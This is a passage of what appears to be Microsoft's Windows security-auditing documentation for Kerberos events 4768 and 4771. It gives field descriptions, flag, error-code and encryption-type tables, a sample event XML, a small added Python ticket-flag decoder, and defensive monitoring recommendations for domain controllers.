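The interpreter deliberately keeps the raw `TargetSid` check as a string comparison: Event Viewer shows "NULL SID" literally in failure events, so there is no SID to resolve and nothing to look up.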
Field Descriptions:
Account Information:
Account Name [Type = UnicodeString]: the name of account, for which (TGT) ticket was requested.
Computer account name ends with $ character.
User account example: dadmin
Computer account example: WIN81$
Supplied Realm Name [Type = UnicodeString]: the name of the Kerberos Realm that Account Name
belongs to. This can appear in a variety of formats, including the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL

Note A Kerberos Realm is a set of managed nodes that share the same Kerberos database. The Kerberos
database resides on the Kerberos master computer system, which should be kept in a physically secure room.
Active Directory domain is the example of Kerberos Realm in the Microsoft Windows Active Directory world.
User ID [Type = SID]: SID of account for which (TGT) ticket was requested. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source
data in the event.
For example: CONTOSO\dadmin or CONTOSO\WIN81$.
NULL SID – this value shows in 4768 Failure events.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Service Information:
Service Name [Type = UnicodeString]: the name of the service in the Kerberos realm to which the TGT request was sent. Typically has the value "krbtgt" for TGT requests, which denotes the Ticket Granting Ticket issuing service.
For Failure events Service Name typically has the following format: krbtgt/REALM_NAME. For example: krbtgt/CONTOSO.
Service ID [Type = SID]: SID of the service account in the Kerberos realm to which the TGT request was sent. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Domain controllers have a specific service account (krbtgt) that is used by the Key Distribution Center (KDC) service to issue Kerberos tickets. It has a built-in, pre-defined SID: S-1-5-21-DOMAIN_IDENTIFIER-502.
NULL SID – this value shows in 4768 Failure events.
Network Information:
Client Address [Type = UnicodeString]: IP address of the computer from which the TGT request was received. Formats vary, and include the following:
IPv6 or IPv4 address.
::ffff:IPv4_address.
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of the client network connection (TGT request connection).
0 for local (localhost) requests.
Additional information:
Ticket Options [Type = HexInt32]: this is a set of different ticket flags in hexadecimal format.
Example:
Ticket Options: 0x40810010
Binary view: 01000000100000010000000000010000
Using MSB 0 bit numbering we have bits 1, 8, 15 and 27 set = Forwardable, Renewable, Canonicalize, Renewable-ok.

Note In the table below "MSB 0" bit numbering is used, because RFC documents use this style. In "MSB 0" style bit numbering begins from the left.

The most common values:
0x40810010 - Forwardable, Renewable, Canonicalize, Renewable-ok
0x40810000 - Forwardable, Renewable, Canonicalize
0x60810010 - Forwardable, Forwarded, Renewable, Canonicalize, Renewable-ok

BIT | FLAG NAME | DESCRIPTION
0 | Reserved | -
1 | Forwardable | (TGT only). Tells the ticket-granting service that it can issue a new TGT—based on the presented TGT—with a different network address based on the presented TGT.
2 | Forwarded | Indicates either that a TGT has been forwarded or that a ticket was issued from a forwarded TGT.
3 | Proxiable | (TGT only). Tells the ticket-granting service that it can issue tickets with a network address that differs from the one in the TGT.
4 | Proxy | Indicates that the network address in the ticket is different from the one in the TGT used to obtain the ticket.
5 | Allow-postdate | Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).
6 | Postdated | Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).
7 | Invalid | This flag indicates that a ticket is invalid, and it must be validated by the KDC before use. Application servers must reject tickets which have this flag set.
8 | Renewable | Used in combination with the End Time and Renew Till fields to cause tickets with long life spans to be renewed at the KDC periodically.
9 | Initial | Indicates that a ticket was issued using the authentication service (AS) exchange and not issued based on a TGT.
10 | Pre-authent | Indicates that the client was authenticated by the KDC before a ticket was issued. This flag usually indicates the presence of an authenticator in the ticket. It can also flag the presence of credentials taken from a smart card logon.
11 | Opt-hardware-auth | This flag was originally intended to indicate that hardware-supported authentication was used during pre-authentication. This flag is no longer recommended in the Kerberos V5 protocol. KDCs MUST NOT issue a ticket with this flag set. KDCs SHOULD NOT preserve this flag if it is set by another KDC.
12 | Transited-policy-checked | KILE MUST NOT check for transited domains on servers or a KDC. Application servers MUST ignore the TRANSITED-POLICY-CHECKED flag.
13 | Ok-as-delegate | The KDC MUST set the OK-AS-DELEGATE flag if the service account is trusted for delegation.
14 | Request-anonymous | KILE does not use this flag.
15 | Name-canonicalize | In order to request referrals the Kerberos client MUST explicitly request the "canonicalize" KDC option for the AS-REQ or TGS-REQ.
16-25 | Unused | -
26 | Disable-transited-check | By default the KDC will check the transited field of a TGT against the policy of the local realm before it will issue derivative tickets based on the TGT. If this flag is set in the request, checking of the transited field is disabled. Tickets issued without the performance of this check will be noted by the reset (0) value of the TRANSITED-POLICY-CHECKED flag, indicating to the application server that the transited field must be checked locally. KDCs are encouraged but not required to honor the DISABLE-TRANSITED-CHECK option. Should not be in use, because the Transited-policy-checked flag is not supported by KILE.
27 | Renewable-ok | The RENEWABLE-OK option indicates that a renewable ticket will be acceptable if a ticket with the requested life cannot otherwise be provided, in which case a renewable ticket may be issued with a renew-till equal to the requested end time. The value of the renew-till field may still be limited by local limits, or limits selected by the individual principal or server.
28 | Enc-tkt-in-skey | No information.
29 | Unused | -
30 | Renew | The RENEW option indicates that the present request is for a renewal. The ticket provided is encrypted in the secret key for the server on which it is valid. This option will only be honored if the ticket to be renewed has its RENEWABLE flag set and if the time in its renew-till field has not passed. The ticket to be renewed is passed in the padata field as part of the authentication header.
31 | Validate | This option is used only by the ticket-granting service. The VALIDATE option indicates that the request is to validate a postdated ticket. Should not be in use, because postdated tickets are not supported by KILE.

Table 2. Kerberos ticket flags.

Note KILE (Microsoft Kerberos Protocol Extension) – Kerberos protocol extensions used in Microsoft operating systems. These extensions provide additional capability for authorization information including group memberships, interactive logon information, and integrity levels.
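
The flag decoding described above, as an added Python example that is not part of the Microsoft documentation: it applies the MSB 0 bit numbering of Table 2 to a Ticket Options value, reproduces the "Binary view" line, and lists any set flags that Table 2 says KILE does not use or support. The set of flags treated as unexpected is this example's own reading of the table.

```python
"""Decode the Ticket Options field of a 4768 event into Kerberos ticket flags.

Added example (not from the Microsoft documentation). It implements the
MSB 0 bit numbering the page uses: bit 0 is the most significant bit of
the 32-bit value, so bit n is set when (value >> (31 - n)) & 1 == 1.
"""

# Bit positions (MSB 0) and flag names as listed in Table 2 on the page.
TICKET_FLAGS = {
    0: "Reserved",
    1: "Forwardable",
    2: "Forwarded",
    3: "Proxiable",
    4: "Proxy",
    5: "Allow-postdate",
    6: "Postdated",
    7: "Invalid",
    8: "Renewable",
    9: "Initial",
    10: "Pre-authent",
    11: "Opt-hardware-auth",
    12: "Transited-policy-checked",
    13: "Ok-as-delegate",
    14: "Request-anonymous",
    15: "Name-canonicalize",
    26: "Disable-transited-check",
    27: "Renewable-ok",
    28: "Enc-tkt-in-skey",
    30: "Renew",
    31: "Validate",
}

# Flags Table 2 says KILE does not use or should not support (this example's
# own selection); seeing one of them in a TGT request deserves a second look.
UNEXPECTED_IN_KILE = {5, 6, 11, 12, 14, 26, 31}


def set_bits_msb0(value: int) -> list[int]:
    """Return the MSB 0 bit numbers that are set in a 32-bit value."""
    return [n for n in range(32) if (value >> (31 - n)) & 1]


def decode_ticket_options(ticket_options: str) -> list[str]:
    """Map a hex Ticket Options string such as '0x40810010' to flag names.

    Bits that are set but not named in Table 2 are reported as 'bit-N'.
    """
    value = int(ticket_options, 16)
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("Ticket Options must be a 32-bit value")
    return [TICKET_FLAGS.get(n, f"bit-{n}") for n in set_bits_msb0(value)]


def binary_view(ticket_options: str) -> str:
    """Render the 32-bit binary string exactly as the page's 'Binary view'."""
    return format(int(ticket_options, 16), "032b")


def unexpected_flags(ticket_options: str) -> list[str]:
    """Flags present in the request that KILE does not use or support."""
    value = int(ticket_options, 16)
    return [TICKET_FLAGS[n] for n in set_bits_msb0(value) if n in UNEXPECTED_IN_KILE]


if __name__ == "__main__":
    # The three "most common values" from the page.
    for sample in ("0x40810010", "0x40810000", "0x60810010"):
        print(sample, binary_view(sample), ", ".join(decode_ticket_options(sample)))
```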

Result Code [Type = HexInt32]: hexadecimal result code of the TGT issue operation. "Table 3. TGT/TGS issue error codes." lists the most common error codes for this event.

CODE | CODE NAME | DESCRIPTION | POSSIBLE CAUSES
0x0 | KDC_ERR_NONE | No error | No errors were found.
0x1 | KDC_ERR_NAME_EXP | Client's entry in KDC database has expired | No information.
0x2 | KDC_ERR_SERVICE_EXP | Server's entry in KDC database has expired | No information.
0x3 | KDC_ERR_BAD_PVNO | Requested Kerberos version number not supported | No information.
0x4 | KDC_ERR_C_OLD_MAST_KVNO | Client's key encrypted in old master key | No information.
0x5 | KDC_ERR_S_OLD_MAST_KVNO | Server's key encrypted in old master key | No information.
0x6 | KDC_ERR_C_PRINCIPAL_UNKNOWN | Client not found in Kerberos database | The username doesn't exist.
0x7 | KDC_ERR_S_PRINCIPAL_UNKNOWN | Server not found in Kerberos database | This error can occur if the domain controller cannot find the server's name in Active Directory. This error is similar to KDC_ERR_C_PRINCIPAL_UNKNOWN except that it occurs when the server name cannot be found.
0x8 | KDC_ERR_PRINCIPAL_NOT_UNIQUE | Multiple principal entries in KDC database | This error occurs if duplicate principal names exist. Unique principal names are crucial for ensuring mutual authentication. Thus, duplicate principal names are strictly forbidden, even across multiple realms. Without unique principal names, the client has no way of ensuring that the server it is communicating with is the correct one.
0x9 | KDC_ERR_NULL_KEY | The client or server has a null key (master key) | No master key was found for client or server. Usually it means that the administrator should reset the password on the account.
0xA | KDC_ERR_CANNOT_POSTDATE | Ticket (TGT) not eligible for postdating | This error can occur if a client requests postdating of a Kerberos ticket. Postdating is the act of requesting that a ticket's start time be set into the future. It also can occur if there is a time difference between the client and the KDC.
0xB | KDC_ERR_NEVER_VALID | Requested start time is later than end time | There is a time difference between the KDC and the client.
0xC | KDC_ERR_POLICY | Requested start time is later than end time | This error is usually the result of logon restrictions in place on a user's account. For example workstation restriction, smart card authentication requirement or logon time restriction.
0xD | KDC_ERR_BADOPTION | KDC cannot accommodate requested option | Impending expiration of a TGT. The SPN to which the client is attempting to delegate credentials is not in its Allowed-to-delegate-to list.
0xE | KDC_ERR_ETYPE_NOTSUPP | KDC has no support for encryption type | In general, this error occurs when the KDC or a client receives a packet that it cannot decrypt.
0xF | KDC_ERR_SUMTYPE_NOSUPP | KDC has no support for checksum type | The KDC, server, or client receives a packet for which it does not have a key of the appropriate encryption type. The result is that the computer is unable to decrypt the ticket.
0x10 | KDC_ERR_PADATA_TYPE_NOSUPP | KDC has no support for PADATA type (pre-authentication data) | Smart card logon is being attempted and the proper certificate cannot be located. This can happen because the wrong certification authority (CA) is being queried or the proper CA cannot be contacted. It can also happen when a domain controller doesn't have a certificate installed for smart cards (Domain Controller or Domain Controller Authentication templates). This error code cannot occur in event "4768. A Kerberos authentication ticket (TGT) was requested". It occurs in the "4771. Kerberos pre-authentication failed" event.
0x11 | KDC_ERR_TRTYPE_NO_SUPP | KDC has no support for transited type | No information.
0x12 | KDC_ERR_CLIENT_REVOKED | Client's credentials have been revoked | This might be because of an explicit disabling or because of other restrictions in place on the account. For example: account disabled, expired, or locked out.
0x13 | KDC_ERR_SERVICE_REVOKED | Credentials for server have been revoked | No information.
0x14 | KDC_ERR_TGT_REVOKED | TGT has been revoked | Since the remote KDC may change its PKCROSS key while there are PKCROSS tickets still active, it SHOULD cache the old PKCROSS keys until the last issued PKCROSS ticket expires. Otherwise, the remote KDC will respond to a client with a KRB-ERROR message of type KDC_ERR_TGT_REVOKED. See RFC1510 for more details.
0x15 | KDC_ERR_CLIENT_NOTYET | Client not yet valid—try again later | No information.
0x16 | KDC_ERR_SERVICE_NOTYET | Server not yet valid—try again later | No information.
0x17 | KDC_ERR_KEY_EXPIRED | Password has expired—change password to reset | The user's password has expired. This error code cannot occur in event "4768. A Kerberos authentication ticket (TGT) was requested". It occurs in the "4771. Kerberos pre-authentication failed" event.
0x18 | KDC_ERR_PREAUTH_FAILED | Pre-authentication information was invalid | The wrong password was provided. This error code cannot occur in event "4768. A Kerberos authentication ticket (TGT) was requested". It occurs in the "4771. Kerberos pre-authentication failed" event.
0x19 | KDC_ERR_PREAUTH_REQUIRED | Additional pre-authentication required | This error often occurs in UNIX interoperability scenarios. MIT-Kerberos clients do not request pre-authentication when they send a KRB_AS_REQ message. If pre-authentication is required (the default), Windows systems will send this error. Most MIT-Kerberos clients will respond to this error by giving the pre-authentication, in which case the error can be ignored, but some clients might not respond in this way.
0x1A | KDC_ERR_SERVER_NOMATCH | KDC does not know about the requested server | No information.
0x1B | KDC_ERR_SVC_UNAVAILABLE | KDC is unavailable | No information.
0x1F | KRB_AP_ERR_BAD_INTEGRITY | Integrity check on decrypted field failed | The authenticator was encrypted with something other than the session key. The result is that the client cannot decrypt the resulting message. The modification of the message could be the result of an attack or it could be because of network noise.
0x20 | KRB_AP_ERR_TKT_EXPIRED | The ticket has expired | The smaller the value for the "Maximum lifetime for user ticket" Kerberos policy setting, the more likely it is that this error will occur. Because ticket renewal is automatic, you should not have to do anything if you get this message.
0x21 | KRB_AP_ERR_TKT_NYV | The ticket is not yet valid | The ticket presented to the server is not yet valid (in relationship to the server time). The most probable cause is that the clocks on the KDC and the client are not synchronized. If cross-realm Kerberos authentication is being attempted, then you should verify time synchronization between the KDC in the target realm and the KDC in the client realm, as well.
0x22 | KRB_AP_ERR_REPEAT | The request is a replay | This error indicates that a specific authenticator showed up twice — the KDC has detected that this session ticket duplicates one that it has already received.
0x23 | KRB_AP_ERR_NOT_US | The ticket is not for us | The server has received a ticket that was meant for a different realm.
0x24 | KRB_AP_ERR_BADMATCH | The ticket and authenticator do not match | The KRB_TGS_REQ is being sent to the wrong KDC. There is an account mismatch during protocol transition.
0x25 | KRB_AP_ERR_SKEW | The clock skew is too great | This error is logged if a client computer sends a timestamp whose value differs from that of the server's timestamp by more than the number of minutes found in the "Maximum tolerance for computer clock synchronization" setting in Kerberos policy.
0x26 | KRB_AP_ERR_BADADDR | Network address in network layer header doesn't match address inside ticket | Session tickets MAY include the addresses from which they are valid. This error can occur if the address of the computer sending the ticket is different from the valid address in the ticket. A possible cause of this could be an Internet Protocol (IP) address change. Another possible cause is when a ticket is passed through a proxy server or NAT. The client is unaware of the address scheme used by the proxy server, so unless the program caused the client to request a proxy server ticket with the proxy server's source address, the ticket could be invalid.
0x27 | KRB_AP_ERR_BADVERSION | Protocol version numbers don't match (PVNO) | When an application receives a KRB_SAFE message, it verifies it. If any error occurs, an error code is reported for use by the application. The message is first checked by verifying that the protocol version and type fields match the current version and KRB_SAFE, respectively. A mismatch generates a KRB_AP_ERR_BADVERSION. See RFC4120 for more details.
0x28 | KRB_AP_ERR_MSG_TYPE | Message type is unsupported | This message is generated when the target server finds that the message format is wrong. This applies to KRB_AP_REQ, KRB_SAFE, KRB_PRIV and KRB_CRED messages. This error is also generated if use of the UDP protocol is being attempted with User-to-User authentication.
0x29 | KRB_AP_ERR_MODIFIED | Message stream modified and checksum didn't match | The authentication data was encrypted with the wrong key for the intended server. The authentication data was modified in transit by a hardware or software error, or by an attacker. The client sent the authentication data to the wrong server because incorrect DNS data caused the client to send the request to the wrong server. The client sent the authentication data to the wrong server because DNS data was out-of-date on the client.
0x2A | KRB_AP_ERR_BADORDER | Message out of order (possible tampering) | This event generates for KRB_SAFE and KRB_PRIV messages if an incorrect sequence number is included, or if a sequence number is expected but not present. See RFC4120 for more details.
0x2C | KRB_AP_ERR_BADKEYVER | Specified version of key is not available | This error might be generated on the server side during receipt of an invalid KRB_AP_REQ message. If the key version indicated by the Ticket in the KRB_AP_REQ is not one the server can use (e.g., it indicates an old key, and the server no longer possesses a copy of the old key), the KRB_AP_ERR_BADKEYVER error is returned.
0x2D | KRB_AP_ERR_NOKEY | Service key not available | This error might be generated on the server side during receipt of an invalid KRB_AP_REQ message. Because it is possible for the server to be registered in multiple realms, with different keys in each, the realm field in the unencrypted portion of the ticket in the KRB_AP_REQ is used to specify which secret key the server should use to decrypt that ticket. The KRB_AP_ERR_NOKEY error code is returned if the server doesn't have the proper key to decipher the ticket.
0x2E | KRB_AP_ERR_MUT_FAIL | Mutual authentication failed | No information.
0x2F | KRB_AP_ERR_BADDIRECTION | Incorrect message direction | No information.
0x30 | KRB_AP_ERR_METHOD | Alternative authentication method required | According to RFC4120 this error message is obsolete.
0x31 | KRB_AP_ERR_BADSEQ | Incorrect sequence number in message | No information.
0x32 | KRB_AP_ERR_INAPP_CKSUM | Inappropriate type of checksum in message (checksum may be unsupported) | When the KDC receives a KRB_TGS_REQ message it decrypts it, and after that, the user-supplied checksum in the Authenticator MUST be verified against the contents of the request. The message MUST be rejected either if the checksums do not match (with an error code of KRB_AP_ERR_MODIFIED) or if the checksum is not collision-proof (with an error code of KRB_AP_ERR_INAPP_CKSUM).
0x33 | KRB_AP_PATH_NOT_ACCEPTED | Desired path is unreachable | No information.
0x34 | KRB_ERR_RESPONSE_TOO_BIG | Too much data | The size of a ticket is too large to be transmitted reliably via UDP. In a Windows environment, this message is purely informational. A computer running a Windows operating system will automatically try TCP if UDP fails.
0x3C | KRB_ERR_GENERIC | Generic error | Group membership has overloaded the PAC. Multiple recent password changes have not propagated. Crypto subsystem error caused by running out of memory. SPN too long. SPN has too many parts.
0x3D | KRB_ERR_FIELD_TOOLONG | Field is too long for this implementation | Each request (KRB_KDC_REQ) and response (KRB_KDC_REP or KRB_ERROR) sent over the TCP stream is preceded by the length of the request as 4 octets in network byte order. The high bit of the length is reserved for future expansion and MUST currently be set to zero. If a KDC that does not understand how to interpret a set high bit of the length encoding receives a request with the high order bit of the length set, it MUST return a KRB-ERROR message with the error KRB_ERR_FIELD_TOOLONG and MUST close the TCP stream.
0x3E | KDC_ERR_CLIENT_NOT_TRUSTED | The client trust failed or is not implemented | This typically happens when the user's smart-card certificate is revoked or the root Certification Authority that issued the smart card certificate (in a chain) is not trusted by the domain controller.
0x3F | KDC_ERR_KDC_NOT_TRUSTED | The KDC server trust failed or could not be verified | The trustedCertifiers field contains a list of certification authorities trusted by the client, in the case that the client does not possess the KDC's public key certificate. If the KDC has no certificate signed by any of the trustedCertifiers, then it returns an error of type KDC_ERR_KDC_NOT_TRUSTED. See RFC1510 for more details.
0x40 | KDC_ERR_INVALID_SIG | The signature is invalid | This error is related to PKINIT. If a PKI trust relationship exists, the KDC then verifies the client's signature on AuthPack (TGT request signature). If that fails, the KDC returns an error message of type KDC_ERR_INVALID_SIG.
0x41 | KDC_ERR_KEY_TOO_WEAK | A higher encryption level is needed | If the clientPublicValue field is filled in, indicating that the client wishes to use Diffie-Hellman key agreement, then the KDC checks to see that the parameters satisfy its policy. If they do not (e.g., the prime size is insufficient for the expected encryption type), then the KDC sends back an error message of type KDC_ERR_KEY_TOO_WEAK.
0x42 | KRB_AP_ERR_USER_TO_USER_REQUIRED | User-to-user authorization is required | In the case that the client application doesn't know that a service requires user-to-user authentication, and requests and receives a conventional KRB_AP_REP, the client will send the KRB_AP_REP request, and the server will respond with a KRB_ERROR token as described in RFC1964, with a msg-type of KRB_AP_ERR_USER_TO_USER_REQUIRED.
0x43 | KRB_AP_ERR_NO_TGT | No TGT was presented or available | In user-to-user authentication if the service does not possess a ticket granting ticket, it should return the error KRB_AP_ERR_NO_TGT.
0x44 | KDC_ERR_WRONG_REALM | Incorrect domain or principal | Although this error rarely occurs, it occurs when a client presents a cross-realm TGT to a realm other than the one specified in the TGT. Typically, this results from incorrectly configured DNS.

Table 3. TGT/TGS issue error codes.

Ticket Encryption Type [Type = HexInt32]: the cryptographic suite that was used for the issued TGT.

Table 4. Kerberos encryption types

TYPE | TYPE NAME | DESCRIPTION
0x1 | DES-CBC-CRC | Disabled by default starting from Windows 7 and Windows Server 2008 R2.
0x3 | DES-CBC-MD5 | Disabled by default starting from Windows 7 and Windows Server 2008 R2.
0x11 | AES128-CTS-HMAC-SHA1-96 | Supported starting from Windows Server 2008 and Windows Vista.
0x12 | AES256-CTS-HMAC-SHA1-96 | Supported starting from Windows Server 2008 and Windows Vista.
0x17 | RC4-HMAC | Default suite for operating systems before Windows Server 2008 and Windows Vista.
0x18 | RC4-HMAC-EXP | Default suite for operating systems before Windows Server 2008 and Windows Vista.
0xFFFFFFFF or 0xffffffff | - | This type shows in Audit Failure events.

Pre-Authentication Type [Type = UnicodeString]: the code number of the pre-authentication type that was used in the TGT request.

Table 5. Kerberos Pre-Authentication types.

TYPE | TYPE NAME | DESCRIPTION
0 | - | Logon without Pre-Authentication.
2 | PA-ENC-TIMESTAMP | This is a normal type for standard password authentication.
11 | PA-ETYPE-INFO | The ETYPE-INFO pre-authentication type is sent by the KDC in a KRB-ERROR indicating a requirement for additional pre-authentication. It is usually used to notify a client of which key to use for the encryption of an encrypted timestamp for the purposes of sending a PA-ENC-TIMESTAMP pre-authentication value. This Pre-Authentication Type has not been seen in a Microsoft Active Directory environment.
15 | PA-PK-AS-REP_OLD | Used for Smart Card logon authentication.
17 | PA-PK-AS-REP | This type should also be used for Smart Card authentication, but in certain Active Directory environments, it is never seen.
19 | PA-ETYPE-INFO2 | The ETYPE-INFO2 pre-authentication type is sent by the KDC in a KRB-ERROR indicating a requirement for additional pre-authentication. It is usually used to notify a client of which key to use for the encryption of an encrypted timestamp for the purposes of sending a PA-ENC-TIMESTAMP pre-authentication value. This Pre-Authentication Type has not been seen in a Microsoft Active Directory environment.
20 | PA-SVR-REFERRAL-INFO | Used in KDC Referrals tickets.
138 | PA-ENCRYPTED-CHALLENGE | Logon using Kerberos Armoring (FAST). Supported starting from Windows Server 2012 domain controllers and Windows 8 clients.
- | - | This type shows in Audit Failure events.

Certificate Information:
Certificate Issuer Name [Type = UnicodeString]: the name of the Certification Authority that issued the smart card certificate. Appears in the Issued by field of the certificate.
Certificate Serial Number [Type = UnicodeString]: the smart card certificate's serial number. Can be found in the Serial number field of the certificate.
Certificate Thumbprint [Type = UnicodeString]: the smart card certificate's thumbprint. Can be found in the Thumbprint field of the certificate.

Security Monitoring Recommendations

For 4768(S, F): A Kerberos authentication ticket (TGT) was requested.

TYPE OF MONITORING REQUIRED | RECOMMENDATION
High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on. | Monitor this event with the "User ID" that corresponds to the high-value account or accounts.
Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours. | When you monitor for anomalies or malicious actions, use the "User ID" (with other information) to monitor how or when a particular account is being used.
Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used. | Monitor this event with the "User ID" that corresponds to the accounts that should never be used.
Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events. | If this event corresponds to a "whitelist-only" action, review the "User ID" for accounts that are outside the whitelist.
External accounts: You might be monitoring accounts from another domain, or "external" accounts that are not allowed to perform certain actions (represented by certain specific events). | Monitor this event for the "Supplied Realm Name" corresponding to another domain or "external" location.
Account naming conventions: Your organization might have specific naming conventions for account names. | Monitor "User ID" for names that don't comply with naming conventions.

You can track all 4768 events where the Client Address is not from your internal IP range or not from private IP ranges.
If you know that an Account Name should be used only from a known list of IP addresses, track all Client Address values for this Account Name in 4768 events. If the Client Address is not on the whitelist, generate an alert.
Client Address = ::1 means local authentication. If you know the list of accounts that should log on to the domain controllers, monitor for all violations where Client Address = ::1 and the Account Name is not allowed to log on to any domain controller.
All 4768 events with a Client Port value > 0 and < 1024 should be examined, because a well-known port was used for an outbound connection.
Also consider monitoring the fields shown in the following table, to discover the issues listed:

FIELD | ISSUE TO DISCOVER
Certificate Issuer Name | Certification authority name is not from your PKI infrastructure.
Certificate Issuer Name | Certification authority name is not authorized to issue smart card authentication certificates.
Pre-Authentication Type | Value is 0, which means that pre-authentication was not used. All accounts should use Pre-Authentication, except accounts configured with "Do not require Kerberos preauthentication," which is a security risk. For more information, see Table 5. Kerberos Pre-Authentication types.
Pre-Authentication Type | Value is not 15 when the account must use a smart card for authentication. For more information, see Table 5. Kerberos Pre-Authentication types.
Pre-Authentication Type | Value is not 2 when only standard password authentication is in use in the organization. For more information, see Table 5. Kerberos Pre-Authentication types.
Pre-Authentication Type | Value is not 138 when Kerberos Armoring is enabled for all Kerberos communications in the organization. For more information, see Table 5. Kerberos Pre-Authentication types.
Ticket Encryption Type | Value is 0x1 or 0x3, which means the DES algorithm was used. DES should not be in use, because of low security and known vulnerabilities. It is disabled by default starting from Windows 7 and Windows Server 2008 R2. For more information, see Table 4. Kerberos encryption types.
Ticket Encryption Type | Starting with Windows Vista and Windows Server 2008, monitor for values other than 0x11 and 0x12. These are the expected values, starting with these operating systems, and represent AES-family algorithms. For more information, see Table 4. Kerberos encryption types.
Result Code | 0x6 (The username doesn't exist), if you see, for example, N events in the last N minutes. This can be an indicator of an account enumeration attack, especially for highly critical accounts.
Result Code | 0x7 (Server not found in Kerberos database). This error can occur if the domain controller cannot find the server's name in Active Directory.
Result Code | 0x8 (Multiple principal entries in KDC database). This will help you find duplicate SPNs faster.
Result Code | 0x9 (The client or server has a null key (master key)). This error can help you identify problems with Kerberos authentication faster.
Result Code | 0xA (Ticket (TGT) not eligible for postdating). Microsoft systems should not request postdated tickets. These events could help identify anomalous activity.
Result Code | 0xC (Requested start time is later than end time), if you see, for example, N events in the last N minutes. This can be an indicator of an account compromise attempt, especially for highly critical accounts.
Result Code | 0xE (KDC has no support for encryption type). In general, this error occurs when the KDC or a client receives a packet that it cannot decrypt. Monitor for these events because this should not happen in a standard Active Directory environment.
Result Code | 0xF (KDC has no support for checksum type). Monitor for these events because this should not happen in a standard Active Directory environment.
Result Code | 0x12 (Client's credentials have been revoked), if you see, for example, N events in the last N minutes. This can be an indicator of anomalous activity or a brute-force attack, especially for highly critical accounts.
Result Code | 0x1F (Integrity check on decrypted field failed). The authenticator was encrypted with something other than the session key. The result is that the KDC cannot decrypt the TGT. The modification of the message could be the result of an attack or it could be because of network noise.
Result Code | 0x22 (The request is a replay). This error indicates that a specific authenticator showed up twice—the KDC has detected that this session ticket duplicates one that it has already received. It could be a sign of an attack attempt.
Result Code | 0x29 (Message stream modified and checksum didn't match). The authentication data was encrypted with the wrong key for the intended server. The authentication data was modified in transit by a hardware or software error, or by an attacker. Monitor for these events because this should not happen in a standard Active Directory environment.
Result Code | 0x3C (Generic error). This error can help you more quickly identify problems with Kerberos authentication.
Result Code | 0x3E (The client trust failed or is not implemented). This error helps you identify logon attempts with revoked certificates and the situations when the root Certification Authority that issued the smart card certificate (through a chain) is not trusted by a domain controller.
Result Code | 0x3F, 0x40, 0x41 errors. These errors can help you more quickly identify smart-card related problems with Kerberos authentication.
4771(F): Kerberos pre-authentication failed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos Authentication Service
Event Description:
This event generates every time the Key Distribution Center fails to issue a Kerberos Ticket Granting Ticket (TGT). This can occur when a domain controller doesn’t have a certificate installed for smart card authentication (for example, with a “Domain Controller” or “Domain Controller Authentication” template), the user’s password has expired, or the wrong password was provided.
This event generates only on domain controllers.
This event is not generated if the “Do not require Kerberos preauthentication” option is set for the account.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4771</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14339</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8010000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-07T18:10:21.495462300Z" />
    <EventRecordID>166708</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1084" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">dadmin</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="ServiceName">krbtgt/CONTOSO.LOCAL</Data>
    <Data Name="TicketOptions">0x40810010</Data>
    <Data Name="Status">0x10</Data>
    <Data Name="PreAuthType">15</Data>
    <Data Name="IpAddress">::ffff:10.0.0.12</Data>
    <Data Name="IpPort">49254</Data>
    <Data Name="CertIssuerName" />
    <Data Name="CertSerialNumber" />
    <Data Name="CertThumbprint" />
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Account Information:
Security ID [Type = SID]: SID of the account object for which the TGT was requested. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
For example: CONTOSO\dadmin or CONTOSO\WIN81$.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account for which the TGT was requested. Computer account names end with the $ character.
User account example: dadmin
Computer account example: WIN81$
Service Information:
Service Name [Type = UnicodeString]: the name of the service in the Kerberos Realm to which the TGT request was sent. Typically has one of the following formats:
krbtgt/DOMAIN_NETBIOS_NAME. Example: krbtgt/CONTOSO
